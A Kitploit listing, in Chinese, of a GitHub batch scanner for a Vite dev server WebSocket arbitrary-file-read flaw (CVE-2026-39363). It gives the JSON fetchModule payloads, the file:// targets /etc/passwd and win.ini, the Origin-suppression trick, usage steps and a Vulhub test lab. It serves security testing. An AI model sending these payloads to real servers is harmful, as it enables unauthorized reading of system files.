Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-39363 — Batch vulnerability scanner for CVE-2026-39363 in Vite dev server, exploiting WebSocket origin validation bypass to read arbitrary files via fetchModule with file:// protocol. | Kitploit
工具/GitHubGitHub/f4s1on/cve-2026-39363
Vulnerability ScannersExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubf4s1on/cve-2026-39363

CVE-2026-39363

Batch vulnerability scanner for CVE-2026-39363 in Vite dev server, exploiting WebSocket origin validation bypass to read arbitrary files via fetchModule with file:// protocol.

查看仓库
3个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-39363 — Vite Dev Server WebSocket 任意文件读取批量检测

免责声明: 本工具仅用于授权的安全测试和教育研究。使用者应遵守当地法律法规,未经授权扫描或攻击他人系统属于违法行为。作者不对任何滥用行为承担责任。

漏洞描述

Vite 开发服务器(6.0.0 ~ 6.4.1, 7.0.0 ~ 7.3.1, 8.0.0 ~ 8.0.4)的 HMR WebSocket 未校验 Origin 头,攻击者可通过 vite:invoke 事件调用 fetchModule,使用 file:// 协议配合 ?raw 参数绕过 server.fs.allow 限制,读取服务器任意文件。

检测流程

root@kitploit:~
url.txt → http://host:port
  ↓ 解析 host + port
  ↓
┌─ Step 1: 尝试 ws://host:给定端口
│  ├─ WebSocket 握手成功 + exploit 成功 → 存在漏洞
│  └─ 失败 → 如果给定端口 == 5173 → 不存在漏洞
│
└─ Step 3: 探测 host:5173(仅当给定端口 ≠ 5173)
   ├─ 端口关闭 → 不存在漏洞
   └─ 端口开放 → WebSocket 握手 + exploit 在 5173 上
        ├─ 成功 → 存在漏洞
        └─ 失败 → 不存在漏洞

使用方法

安装依赖

root@kitploit:~
pip install -r requirements.txt

开启和关闭代理

要开启代理取消脚本26-27行的注释即可

root@kitploit:~
# 要开启代理的话,取消下面两行注释,并设置正确的代理地址和端口
# os.environ["HTTP_PROXY"] = "http://127.0.0.1:8083"
# os.environ["HTTPS_PROXY"] = "http://127.0.0.1:8083"

准备目标

在 url.txt 中写入目标 URL,每行一个:

root@kitploit:~
http://192.168.1.100:5173
http://example.com
http://target.cn:8080

运行

root@kitploit:~
python cve_2026_39363.py

输出

终端:

root@kitploit:~
[*] Loaded 3 URL(s), scanning with 3 thread(s)...

http://192.168.1.100:5173 存在漏洞 (Linux)
http://example.com 存在漏洞 (Linux)
http://target.cn:8080 不存在漏洞

[*] Done. 2/3 vulnerable, elapsed 3.2s
[*] Results saved to result.txt

result.txt:

root@kitploit:~
http://192.168.1.100:5173 (Linux)
http://example.com:5173 (Linux)

每行包含 POC 类型 (Linux / Windows),标识成功读取到的文件特征。

POC 验证文件

目标系统读取文件特征标记
Linuxfile:///etc/passwd?rawroot:
Windowsfile:///C:/Windows/win.ini?rawfor 16-bit app support

Exploit Payload

支持两种 payload 格式(按顺序尝试):

  1. Vulhub PoC 格式:{"id":"send:0","name":"fetchModule","data":[file_path]}
  2. 内部 RPC 格式:{"fn":"fetchModule","args":[file_path]}

WebSocket 关键参数

参数值原因
子协议vite-hmrVite HMR WebSocket 要求
Origin抑制发送 (suppress_origin=True)Vite 拒绝带 Origin 头的非浏览器连接

Docker 漏洞环境测试

root@kitploit:~
# 启动
docker run -d --name vite-vuln -p 5173:5173 vulhub/vite:7.3.1

# 扫描
echo "http://127.0.0.1:5173" > url.txt
python cve_2026_39363.py

# 清理
docker stop vite-vuln && docker rm vite-vuln

常见问题

Q: 所有检测都返回"不存在漏洞"?

  • 确认目标端口 5173 是否开放
  • 确认 Vite dev server 使用了 --host 或 server.host 暴露到网络
  • 确认 WebSocket 未被 server.ws: false 禁用

Q: Windows 下输出乱码?

  • 脚本已自动处理,若仍有问题请确认终端为 UTF-8 编码

Q: PowerShell 生成的 url.txt 无法解析?

  • 脚本使用 utf-8-sig 自动跳过 BOM
下载工具